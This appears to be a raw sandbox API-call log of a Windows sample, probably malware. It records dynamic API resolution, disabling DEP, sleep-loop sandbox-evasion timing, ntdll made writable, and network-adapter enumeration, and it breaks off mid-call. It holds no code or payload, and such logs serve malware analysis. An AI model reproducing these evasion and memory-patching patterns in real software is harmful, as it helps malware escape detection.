[0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bc, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bd, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001be, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bf, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ca, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cb, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cc, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cd, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ce, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cf, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.068] GetLastError () returned 0x0 [0085.068] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001da, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001db, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001dc, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001dd, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001de, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001df, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ea, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001eb, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ec, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ed, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.069] GetLastError () returned 0x0 [0085.069] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ee, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.070] GetLastError () returned 0x0 [0085.070] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ef, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.070] GetLastError () returned 0x0 [0085.070] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.070] GetLastError () returned 0x0 [0085.070] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.070] GetLastError () returned 0x0 [0085.070] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.070] GetLastError () returned 0x0 [0085.070] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.070] GetLastError () returned 0x0 [0085.070] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.070] GetLastError () returned 0x0 [0085.070] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.070] GetLastError () returned 0x0 [0085.070] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.070] GetLastError () returned 0x0 [0085.070] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.070] GetLastError () returned 0x0 [0085.070] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.070] GetLastError () returned 0x0 [0085.070] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.070] GetLastError () returned 0x0 [0085.070] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001fa, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.079] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0085.079] SetErrorMode (uMode=0x8001) returned 0x8001 [0085.079] GetProcAddress (hModule=0x759f0000, lpProcName="EnumResourceTypesA") returned 0x75a80efd [0085.079] EnumResourceTypesA (hModule=0x0, lpEnumFunc=0x408bc5, lParam=0x0) [0085.079] SetErrorMode (uMode=0x8001) returned 0x8001 [0085.079] LoadLibraryA (lpLibFileName="shell32") returned 0x75c50000 [0085.081] SetErrorMode (uMode=0x8001) returned 0x8001 [0085.081] GetProcAddress (hModule=0x75c50000, lpProcName="Shell_NotifyIconA") returned 0x75e98af2 [0085.082] Shell_NotifyIconA (dwMessage=0x0, lpData=0x18f370) returned 1 [0085.082] Shell_NotifyIconA (dwMessage=0x2, lpData=0x18f370) returned 1 [0085.086] LoadLibraryA (lpLibFileName="NTDLL") returned 0x77270000 [0085.086] SetErrorMode (uMode=0x8001) returned 0x8001 [0085.086] GetProcAddress (hModule=0x77270000, lpProcName="ZwSetInformationProcess") returned 0x7728fb18 [0085.086] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x22, ProcessInformation=0x400004, ProcessInformationLength=0x4) returned 0x0 [0085.087] SetErrorMode (uMode=0x8001) returned 0x8001 [0085.087] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0085.087] SetErrorMode (uMode=0x8001) returned 0x8001 [0085.087] GetProcAddress (hModule=0x759f0000, lpProcName="Sleep") returned 0x75a010ff [0085.087] SetErrorMode (uMode=0x8001) returned 0x8001 [0085.087] LoadLibraryA (lpLibFileName="user32") returned 0x75790000 [0085.087] SetErrorMode (uMode=0x8001) returned 0x8001 [0085.087] GetProcAddress (hModule=0x75790000, lpProcName="GetDesktopWindow") returned 0x757b0a19 [0085.087] GetDesktopWindow () returned 0x10010 [0085.087] SetErrorMode (uMode=0x8001) returned 0x8001 [0085.087] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0085.087] SetErrorMode (uMode=0x8001) returned 0x8001 [0085.087] GetProcAddress (hModule=0x759f0000, lpProcName="HeapAlloc") returned 0x7729e026 [0085.087] SetErrorMode (uMode=0x8001) returned 0x8001 [0085.087] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0085.087] SetErrorMode (uMode=0x8001) returned 0x8001 [0085.088] GetProcAddress (hModule=0x759f0000, lpProcName="SetLastError") returned 0x75a011a9 [0085.088] SetLastError (dwErrCode=0x5) [0085.088] SetErrorMode (uMode=0x8001) returned 0x8001 [0085.088] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0085.088] SetErrorMode (uMode=0x8001) returned 0x8001 [0085.088] GetProcAddress (hModule=0x759f0000, lpProcName="SetErrorMode") returned 0x75a01b00 [0085.088] SetErrorMode (uMode=0x400) returned 0x8001 [0085.088] SetErrorMode (uMode=0x0) returned 0x400 [0085.088] SetErrorMode (uMode=0x8001) returned 0x0 [0085.088] LoadLibraryA (lpLibFileName="ntdll") returned 0x77270000 [0085.088] SetErrorMode (uMode=0x0) returned 0x8001 [0085.088] GetProcAddress (hModule=0x77270000, lpProcName="NtYieldExecution") returned 0x7728ff2c [0085.088] Sleep (dwMilliseconds=0xf) [0085.090] NtYieldExecution () returned 0x0 [0085.090] Sleep (dwMilliseconds=0xf) [0085.106] NtYieldExecution () returned 0x40000024 [0085.106] Sleep (dwMilliseconds=0xf) [0085.121] NtYieldExecution () returned 0x40000024 [0085.121] Sleep (dwMilliseconds=0xf) [0085.136] NtYieldExecution () returned 0x0 [0085.136] Sleep (dwMilliseconds=0xf) [0085.152] NtYieldExecution () returned 0x40000024 [0085.152] Sleep (dwMilliseconds=0xf) [0085.168] NtYieldExecution () returned 0x40000024 [0085.168] Sleep (dwMilliseconds=0xf) [0085.185] NtYieldExecution () returned 0x40000024 [0085.185] Sleep (dwMilliseconds=0xf) [0085.201] NtYieldExecution () returned 0x40000024 [0085.201] Sleep (dwMilliseconds=0xf) [0085.214] NtYieldExecution () returned 0x40000024 [0085.214] Sleep (dwMilliseconds=0xf) [0085.230] NtYieldExecution () returned 0x40000024 [0085.230] Sleep (dwMilliseconds=0xf) [0085.252] NtYieldExecution () returned 0x0 [0085.256] Sleep (dwMilliseconds=0xf) [0085.261] NtYieldExecution () returned 0x40000024 [0085.261] Sleep (dwMilliseconds=0xf) [0085.284] NtYieldExecution () returned 0x40000024 [0085.284] Sleep (dwMilliseconds=0xf) [0085.292] NtYieldExecution () returned 0x40000024 [0085.292] Sleep (dwMilliseconds=0xf) [0085.312] NtYieldExecution () returned 0x40000024 [0085.312] Sleep (dwMilliseconds=0xf) [0085.325] NtYieldExecution () returned 0x40000024 [0085.325] Sleep (dwMilliseconds=0xf) [0085.339] NtYieldExecution () returned 0x40000024 [0085.339] Sleep (dwMilliseconds=0xf) [0085.355] NtYieldExecution () returned 0x40000024 [0085.355] Sleep (dwMilliseconds=0xf) [0085.371] NtYieldExecution () returned 0x40000024 [0085.371] Sleep (dwMilliseconds=0xf) [0085.388] NtYieldExecution () returned 0x40000024 [0085.388] Sleep (dwMilliseconds=0xf) [0085.402] NtYieldExecution () returned 0x40000024 [0085.402] Sleep (dwMilliseconds=0xf) [0085.417] NtYieldExecution () returned 0x40000024 [0085.417] Sleep (dwMilliseconds=0xf) [0085.433] NtYieldExecution () returned 0x40000024 [0085.433] Sleep (dwMilliseconds=0xf) [0085.450] NtYieldExecution () returned 0x40000024 [0085.450] Sleep (dwMilliseconds=0xf) [0085.464] NtYieldExecution () returned 0x40000024 [0085.464] Sleep (dwMilliseconds=0xf) [0085.560] NtYieldExecution () returned 0x0 [0085.560] Sleep (dwMilliseconds=0xf) [0085.573] NtYieldExecution () returned 0x0 [0085.573] Sleep (dwMilliseconds=0xf) [0085.589] NtYieldExecution () returned 0x0 [0085.589] Sleep (dwMilliseconds=0xf) [0085.604] NtYieldExecution () returned 0x0 [0085.604] Sleep (dwMilliseconds=0xf) [0085.620] NtYieldExecution () returned 0x40000024 [0085.620] Sleep (dwMilliseconds=0xf) [0085.637] NtYieldExecution () returned 0x40000024 [0085.637] Sleep (dwMilliseconds=0xf) [0085.651] NtYieldExecution () returned 0x40000024 [0085.651] Sleep (dwMilliseconds=0x1f40) [0093.669] SetErrorMode (uMode=0x8001) returned 0x0 [0093.669] LoadLibraryA (lpLibFileName="ntdll") returned 0x77270000 [0093.669] SetErrorMode (uMode=0x0) returned 0x8001 [0093.670] GetProcAddress (hModule=0x77270000, lpProcName="NtProtectVirtualMemory") returned 0x77290028 [0093.670] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f53c*=0x77280000, NumberOfBytesToProtect=0x18f540, NewAccessProtection=0x40, OldAccessProtection=0x18f544 | out: BaseAddress=0x18f53c*=0x77280000, NumberOfBytesToProtect=0x18f540, OldAccessProtection=0x18f544*=0x20) returned 0x0 [0093.678] SetErrorMode (uMode=0x8001) returned 0x0 [0093.678] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0093.678] SetErrorMode (uMode=0x0) returned 0x8001 [0093.678] GetProcAddress (hModule=0x759f0000, lpProcName="CreateFileA") returned 0x75a053c6 [0093.678] SetErrorMode (uMode=0x8001) returned 0x0 [0093.678] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0093.678] SetErrorMode (uMode=0x0) returned 0x8001 [0093.678] GetProcAddress (hModule=0x759f0000, lpProcName="WriteFile") returned 0x75a01282 [0093.678] SetErrorMode (uMode=0x8001) returned 0x0 [0093.678] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0093.678] SetErrorMode (uMode=0x0) returned 0x8001 [0093.678] GetProcAddress (hModule=0x759f0000, lpProcName="CloseHandle") returned 0x75a01410 [0093.678] SetErrorMode (uMode=0x8001) returned 0x0 [0093.678] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0093.678] SetErrorMode (uMode=0x0) returned 0x8001 [0093.678] GetProcAddress (hModule=0x759f0000, lpProcName="ReadFile") returned 0x75a03ed3 [0093.679] SetErrorMode (uMode=0x8001) returned 0x0 [0093.679] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0093.679] SetErrorMode (uMode=0x0) returned 0x8001 [0093.679] GetProcAddress (hModule=0x759f0000, lpProcName="GetFileSize") returned 0x75a0196e [0093.679] SetErrorMode (uMode=0x8001) returned 0x0 [0093.679] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0093.679] SetErrorMode (uMode=0x0) returned 0x8001 [0093.679] GetProcAddress (hModule=0x759f0000, lpProcName="UnmapViewOfFile") returned 0x75a01826 [0093.679] SetErrorMode (uMode=0x8001) returned 0x0 [0093.679] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0093.679] SetErrorMode (uMode=0x0) returned 0x8001 [0093.679] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualProtectEx") returned 0x75a845bf [0093.679] SetErrorMode (uMode=0x8001) returned 0x0 [0093.679] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0093.679] SetErrorMode (uMode=0x0) returned 0x8001 [0093.679] GetProcAddress (hModule=0x759f0000, lpProcName="GetLongPathNameA") returned 0x75a8437f [0093.679] SetErrorMode (uMode=0x8001) returned 0x0 [0093.679] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0093.679] SetErrorMode (uMode=0x0) returned 0x8001 [0093.680] GetProcAddress (hModule=0x759f0000, lpProcName="TerminateProcess") returned 0x75a1d802 [0093.680] SetErrorMode (uMode=0x8001) returned 0x0 [0093.680] LoadLibraryA (lpLibFileName="IPHlpApi") returned 0x74920000 [0093.681] SetErrorMode (uMode=0x0) returned 0x8001 [0093.681] GetProcAddress (hModule=0x74920000, lpProcName="GetAdaptersInfo") returned 0x74929263 [0093.681] SetErrorMode (uMode=0x8001) returned 0x0 [0093.681] LoadLibraryA 